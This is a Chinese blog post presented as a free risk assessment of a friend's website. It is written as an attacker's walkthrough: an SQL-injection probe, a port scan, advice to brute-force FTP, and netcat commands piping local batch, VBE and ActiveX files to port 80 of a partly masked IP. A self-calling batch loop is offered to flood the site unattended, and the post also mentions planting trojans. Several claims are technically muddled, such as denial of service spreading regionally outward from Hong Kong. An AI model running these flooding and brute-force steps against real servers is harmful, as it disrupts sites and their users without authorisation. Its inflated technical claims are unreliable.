前些日子,我为朋友的网站做了一下先风险评估,从中我学会了一种方法,妙用NC来做压力测试,我就把这种方法介绍给大家吧,现在我是以一个黑客的角度来检测的。
首先我们要明白,风险评估就是要从黑客的角度来看一个站点,那么我们要做风险评估的网站是http://www.****.com(为了不引起误会,我用自己的网址代替),这是一个php类型的网站,这样的网站我们通常是看有无注入漏洞。
我们在地址栏的这个地方http://www.****.com提交一个and 1=1。
网站做了过滤,防注入了。
怎么办?通常从黑客角度来说入侵一个网站不一定要从它的网站程序人手,也就是说不一定从脚本人手。因为我们不可能把asp,php,jsp,cgi,asp.net这些类型的脚本语言都学会,那么我们如何入侵呢?答案是从服务器人手。
我们先做下旁注检测。
独立服务器,那么它开了那些端口呢?
直接看看3389
连接不到它。
要么没开3389,要么改端口了。我们先扫描下。
就扫到21,跟80了。我们继续扫。
OK,下面可以分2路来“入侵”
1、FTP“爆破”
“爆破”就是基于用户名密码的入侵,这样最简单,但是也是最浪费时间的一种入侵方式。不停的猜解就OK了。这样的FTP爆破器很多,童鞋们可以自己下载一个然后开始爆破。
2、下面我们开始讲解一个新方法,用NC来实现压力测试,我们要做的其实很简单入侵用到的“垃圾”文件和一个NC。
下面看我操作:
我们在开始一>允许—>cmd调用出命令提示符。
只要写下面四句话就把要提交的垃圾数据提交上去了:
nc-nvv 180.178.**.**80<c:\1.bat
nc-nvv 180.178.**.**80<c:\2.stat
nc-nvv 180.178.**.**80<c:\3.vbe
nc-nvv 180.178.**.**80<c:\4ocx
OK,就这样就行了。
我们重复输入这4句话,不到10秒就打开这个网站就有点卡了。
下面我讲原理:
nc-nvv 180.178.**.**80<c:\1.bat
nc-nvv 180.178.**.**80<c:\2.stat
nc-nvv 180.178.**.**80<c:\3.vbe
nc-nvv 180.178.**.**80<c:\4ocx
讲解:连接到 180.178.**.**的80端口,并在其管道中发送c:\l.bat,c:\2.stat,c:\3.vbe,c:\4.ocx的内容。
当我们不停的向服务器的管道扔垃圾数据时,就会造成服务器瘫痪。
根据我们扔得“垃圾”的不同,如木马程序,溢出代码等等,对服务器造成的影响也不同。
而今天我扔得是一个批处理一个vbe脚本,还有一个stat文件和一个ActiveX控件。
一台黑客计算机采取这样的方式“入侵”服务器大约1分钟左右,其他人在浏览网站时一般会变成这个样子。
当4台以上计算机对服务器采取这样的方式“入侵”大约10分钟左右,便可造成黑客所在地区与服务器所在地区出现拒绝服务。
同时也可以实现网站挂马等,这要根据你提交的“垃圾”信息而定。
我们是通过正常的方式向它的80端口提交垃圾信息,因为服务器是香港的,所以先是黑客所在地区受到影响,然后是香港地区收到影响,以后这两个点为圆心扩散。
当然,我们不会手动的去一直写下去,我们要用一个批处理来自动执行。
@echo on
c:
cd nc
nc-nvv 180.178.**.**80<c:\1.bat
nc-nvv 180.178.**.**80<c:\2.stat
nc-nvv 180.178.**.**80<c:\3.vbe
nc-nvv 180.178.**.**80<c:\4ocx
call c:\nc\1.bat
之后你就可以挂着机器,然后出去打球,等你回来后你会发现,那个站已经被你蹂躏的面目全非了,写完后我就写了一份报告给了他,嘿嘿,虽然是免费给他搞了一次风险评估,但是从中获得了一些知识,受益不小。
本文来源:危险漫步博客
